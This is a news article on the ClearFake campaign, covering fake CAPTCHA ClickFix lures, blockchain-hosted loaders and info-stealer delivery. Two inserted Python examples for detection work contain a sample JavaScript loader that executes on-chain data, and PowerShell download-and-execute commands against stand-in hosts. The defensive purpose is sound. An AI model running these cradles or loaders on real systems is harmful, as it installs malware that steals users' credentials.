ClearFake Infects 9,300 Sites, Uses Fake reCAPTCHA and Turnstile to Spread Info-Stealers

By Ravie Lakshmanan for The Hacker News | March 19, 2025 | Cloud Security / Web Security

The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verifications as lures to trick users into downloading malware such as Lumma Stealer and Vidar Stealer.

ClearFake, first highlighted in July 2023, is the name given to a threat activity cluster that uses fake web browser update baits on compromised WordPress sites as a malware distribution vector.

The campaign is also known for relying on another technique, EtherHiding, which fetches the next-stage payload from BNB Smart Chain (BSC, formerly Binance Smart Chain) smart contracts: the injected loader reads the payload out of contract storage through a public RPC node, so there is no conventional staging server for defenders to take down, which makes the attack chain more resilient. The end goal of these infection chains is to deliver information-stealing malware capable of targeting both Windows and macOS systems.

Since May 2024, ClearFake attacks have used what has come to be known as ClickFix, a social engineering ploy that tricks users into running malicious PowerShell code themselves under the guise of fixing a non-existent technical issue, in this case a bogus human-verification check.


“Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain,” Sekoia said in a new analysis.

“By using smart contracts’ Application Binary Interfaces, these interactions involve loading multiple JavaScript codes and additional resources that fingerprint the victim’s system, as well as downloading, decrypting and displaying the ClickFix lure.”

The latest iteration of the ClearFake framework marks a significant evolution: it adopts Web3 capabilities to resist analysis and encrypts the ClickFix-related HTML code, with the AES key itself stored on-chain.

The net result is an updated multi-stage attack sequence. A victim visits a compromised site, whose injected script retrieves an intermediate JavaScript stage from BSC; that stage fingerprints the system and then fetches the encrypted ClickFix code hosted on Cloudflare Pages.
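To make the chain above concrete from the defender's side, here is an added example in Python (not code from the article, from Sekoia, or from ClearFake itself): a heuristic scanner that flags inline scripts on a page that talk to a BNB Smart Chain RPC node, issue an eth_call against a contract address, and then decode and execute the response. The indicator patterns, their weights, the threshold, the placeholder contract address and function selector, and both sample pages are assumptions constructed for this example.

```python
"""Heuristic scanner for EtherHiding-style loader scripts injected into web pages.

This is an added illustration, not ClearFake's code and not Sekoia's tooling. It
flags inline <script> bodies that combine the traits described above: a request to
a BNB Smart Chain JSON-RPC node, an eth_call against a contract address, and code
that decodes and executes whatever the chain returns. Indicator patterns, weights,
the threshold and both sample pages are assumptions constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# (indicator name, pattern, weight). Weights are assumptions, not measured rates.
INDICATORS = [
    ("bsc_rpc_endpoint", re.compile(r"https?://[\w.-]*(?:bsc-dataseed|bnbchain)\.[\w.-]+", re.I), 3),
    ("eth_call_jsonrpc", re.compile(r"['\"]eth_call['\"]"), 3),
    ("web3_library",     re.compile(r"\bnew\s+Web3\b|\bethers\.(?:Contract|JsonRpcProvider)\b"), 2),
    ("contract_address", re.compile(r"\b0x[0-9a-fA-F]{40}\b"), 2),
    ("abi_calldata",     re.compile(r"\bdata['\"]?\s*:\s*['\"]0x[0-9a-fA-F]{8}"), 1),
    ("decode_stage",     re.compile(r"\batob\(|\bAES\b|\bdecrypt\("), 1),
    ("execute_stage",    re.compile(r"\beval\(|\bnew\s+Function\(|\.innerHTML\s*="), 1),
]


@dataclass
class Finding:
    script_index: int                  # ordinal of the <script> element in the page
    score: int
    hits: list[str] = field(default_factory=list)
    snippet: str = ""                  # first 80 chars, for the analyst's triage note


def scan_html(html: str) -> list[Finding]:
    """Score every non-empty inline script body against INDICATORS."""
    findings = []
    for idx, body in enumerate(SCRIPT_RE.findall(html)):
        if not body.strip():
            continue                   # <script src=...> only; nothing inline to judge here
        hits = [name for name, pat, _ in INDICATORS if pat.search(body)]
        score = sum(weight for name, _, weight in INDICATORS if name in hits)
        findings.append(Finding(idx, score, hits, body.strip()[:80]))
    return findings


def suspicious_scripts(html: str, threshold: int = 6) -> list[Finding]:
    """Return scripts whose combined indicator weight reaches the threshold.

    Six requires at least one chain-interaction indicator plus supporting traits.
    A legitimate BSC dapp can reach it too, so treat hits as triage leads on sites
    that have no business talking to a blockchain (a WordPress blog, a car dealer).
    """
    return [f for f in scan_html(html) if f.score >= threshold]


# --- constructed samples -------------------------------------------------------
CONTRACT = "0x" + "ab" * 20            # placeholder 20-byte address, not a real contract

BENIGN_PAGE = """<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){ dataLayer.push(arguments); }
  gtag('js', new Date());
</script>
</head><body><p>Hello</p></body></html>"""

# Loader shaped like the chain described above; the selector 0xdeadbeef is a placeholder.
INJECTED_SCRIPT = """<script>
(async () => {
  const rpc = "https://bsc-dataseed.binance.org/";
  const call = { jsonrpc: "2.0", id: 1, method: "eth_call",
                 params: [{ to: "CONTRACT_ADDR", data: "0xdeadbeef" }, "latest"] };
  const res = await fetch(rpc, { method: "POST", body: JSON.stringify(call) });
  const hex = (await res.json()).result.slice(2);
  const text = hex.match(/../g).map(h => String.fromCharCode(parseInt(h, 16))).join("");
  eval(atob(text));
})();
</script>
""".replace("CONTRACT_ADDR", CONTRACT)

INJECTED_PAGE = BENIGN_PAGE.replace("</body>", INJECTED_SCRIPT + "</body>")

if __name__ == "__main__":
    for f in suspicious_scripts(INJECTED_PAGE):
        print(f"script #{f.script_index} score={f.score} hits={f.hits}")
        print("  " + f.snippet)
```

Run it against the HTML of a page you suspect (fetch it with the same User-Agent a real browser sends, since the loader may serve different content to crawlers) and compare the flagged script against a known-good copy of the site's theme or plugins; the script tag itself is usually foreign to the CMS install.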

Should the victim follow through and execute the malicious PowerShell command, it deploys Emmenhtal Loader (aka PEAKLIGHT), which in turn drops Lumma Stealer.
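A detection angle on this step, as an added example (not a Sekoia rule or anything from the article): Python triage over constructed Sysmon-style process-creation events that separates a ClickFix execution (explorer.exe, the parent of anything launched from the Run dialog, spawning PowerShell with a hidden window and a download-and-execute cradle) from an ordinary admin script and from the same cradle launched by a service. The parent-process assumption, the regexes, the field names and the sample events are all constructed for this example.

```python
"""Detection logic for ClickFix-style PowerShell execution over process-creation events.

This is an added example, not a rule from Sekoia or any vendor. It encodes the
behaviour described above: the victim pastes a command into the Run dialog, so
explorer.exe spawns powershell.exe with a hidden window and a download-and-execute
cradle, sometimes trailed by a comment that mimics the fake "verification" text.
Field names follow Sysmon Event ID 1; the regexes and sample events are assumptions.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

PS_IMAGES = ("powershell.exe", "pwsh.exe")
USER_SHELL_PARENTS = ("explorer.exe",)        # Win+R / Run dialog: assumed ClickFix entry point

# (rule name, pattern over the lower-cased command line). Patterns are assumptions.
RULES = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b")),
    ("exec_policy",     re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b|-nop\b|-noprofile\b")),
    ("download_cradle", re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl)\b")),
    ("invoke_expr",     re.compile(r"\b(?:iex|invoke-expression)\b")),
    ("encoded_cmd",     re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{40,}")),
    ("captcha_comment", re.compile(r"#.*(?:not a robot|recaptcha|turnstile|verification)")),
]


@dataclass
class Event:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    label: str                # "clickfix", "suspicious_powershell" or "benign"
    hits: list[str]
    command_line: str


def parse_event(line: str) -> Event:
    """Parse one JSON-per-line process-creation record using Sysmon field names."""
    d = json.loads(line)
    return Event(d["ParentImage"], d["Image"], d["CommandLine"])


def classify(ev: Event) -> Verdict:
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if image not in PS_IMAGES:
        return Verdict("benign", [], ev.command_line)
    cmd = ev.command_line.lower()
    hits = [name for name, pat in RULES if pat.search(cmd)]
    # A cradle is "fetch something remote and run it": a download verb feeding iex,
    # or the whole thing hidden inside an -EncodedCommand blob.
    cradle = ("download_cradle" in hits and "invoke_expr" in hits) or "encoded_cmd" in hits
    # The parent is the discriminator. The same cradle launched by an installer or
    # RMM agent is common; one typed into Win+R by the logged-on user is not.
    if cradle and parent in USER_SHELL_PARENTS:
        return Verdict("clickfix", hits + [f"parent:{parent}"], ev.command_line)
    if cradle or len(hits) >= 3:
        return Verdict("suspicious_powershell", hits, ev.command_line)
    return Verdict("benign", hits, ev.command_line)


def triage(lines: list[str]) -> list[Verdict]:
    return [classify(parse_event(line)) for line in lines]


# --- constructed sample events (not real telemetry) ----------------------------
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {   # ClickFix: pasted into Win+R, hidden window, irm|iex, fake-verification comment
        "ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
        "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (irm https://verify.example.invalid/check)" '
                       '# "I am not a robot - reCAPTCHA Verification ID: 7391"',
    },
    {   # Admin script from a console: policy bypass alone is not a cradle
        "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL,
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # Same cradle shape, but from a service host: suspicious, not user-pasted
        "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": POWERSHELL,
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('https://updates.example.invalid/a.ps1')\"",
    },
    {   # Not PowerShell at all
        "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
    },
]]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(f"{v.label:22s} {v.hits}  {v.command_line[:60]}")
```

The parent check is what keeps this from paging on every deployment script in the estate; if your environment has a legitimate reason for users to type download cradles into the Run dialog, the rule will need an allow-list, and if it does not, a "clickfix" verdict is worth an immediate look at the browser history that preceded it.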

Fake reCAPTCHA and Turnstile

Sekoia said it observed an alternate ClearFake attack chain in late January 2025 that served a PowerShell loader responsible for installing Vidar Stealer. As of February 2025, at least 9,300 websites have been infected with ClearFake.

“The operator has consistently updated the framework code, lures, and distributed payloads on a daily basis,” it added. “ClearFake execution now relies on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands.”

“The number of websites compromised by ClearFake suggests that this threat remains widespread and affects many users worldwide. In July 2024, […] approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.”

The development comes as over 100 auto dealership sites have been discovered compromised with ClickFix lures that lead to the deployment of SectopRAT malware.

“Where this infection on the auto dealerships happened was not on the dealership’s own website, but a third-party video service,” said security researcher Randy McEoin, who detailed some of the earliest ClearFake campaigns in 2023, describing the incident as an instance of a supply chain attack.

The video service in question is LES Automotive (“idostream[.]com”), which has since removed the malicious JavaScript injection from the site.


The findings also coincide with the discovery of several phishing campaigns that are engineered to push various malware families and conduct credential harvesting –

  • Using virtual hard disk (VHD) files embedded within archive file attachments in email messages to distribute Venom RAT by means of a Windows batch script
  • Using Microsoft Excel file attachments that exploit a known security flaw (CVE-2017-0199) to download an HTML Application (HTA) that then uses Visual Basic Script (VBS) to fetch an image, which contains another payload responsible for decoding and launching AsyncRAT and Remcos RAT
  • Exploiting misconfigurations in Microsoft 365 infrastructure to take control of tenants, create new administrative accounts, and deliver phishing content that bypasses email security protections and ultimately facilitates credential harvesting and account takeover (ATO)

As social engineering campaigns grow more sophisticated, organizations need authentication and access-control mechanisms that hold up against Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) techniques, which let attackers hijack accounts even when MFA is in place.

“A pivotal benefit of employing a BitM framework lies in its rapid targeting capability, allowing it to reach any website on the web in a matter of seconds and with minimal configuration,” Google-owned Mandiant said in a report published this week.

“Once an application is targeted through a BitM tool or framework, the legitimate site is served through an attacker-controlled browser. This makes the distinction between a legitimate and a fake site exceptionally challenging for a victim. From the perspective of an adversary, BitM allows for a simple yet effective means of stealing sessions protected by MFA.”
